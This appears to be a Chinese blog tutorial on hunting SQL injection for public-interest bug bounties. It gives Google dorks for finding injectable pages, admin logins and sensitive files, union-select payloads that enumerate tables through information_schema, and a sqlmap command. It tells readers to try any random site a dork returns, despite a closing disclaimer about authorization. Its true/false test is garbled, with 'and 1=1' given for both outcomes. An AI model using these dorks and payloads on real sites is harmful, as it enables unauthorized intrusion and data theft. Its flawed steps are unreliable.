-
超级干货!如何挖公益SRC实战/SQL注入
目录
一、信息收集
1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf二、实战演示
1.谷歌语法搜索
inurl:php id=62
随便点进一个带有id传参=62的网站,大概率存在SQL注入
2.判断是否存在SQL注入漏洞,显示页面正常id=62 and 1=1
3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
4.查找列数id=62 order by 10
发现列数是10
5.查看回显点id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe
6.输出表名
id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe
三、使用sqlmap进行验证
使用sqlmap命令查看库名
sqlmap.py -u url --dbs
四、总结
1.谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持!申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
-
相关阅读:
蓝桥杯练习题五 - 四平方和(c++)
效率工具:“蓝色书签”文件管理工具免费使用
【Deep Learning 5】FNN前馈神经网络
linux排查木马后门之定时任务计划
如何使用XSSFWorkbook读取文本薄?
【ArcGIS Pro二次开发】(71):添加图层名称和路径到字段
某瑞集团安全技术研发岗位面试
Linux nohup bash cm_watch.sh >> run.log 2>&1 &
Java中的JDBC如何连接数据库并执行操作
libcurl库使用
- 原文地址:https://blog.csdn.net/zkaqlaoniao/article/details/134422826
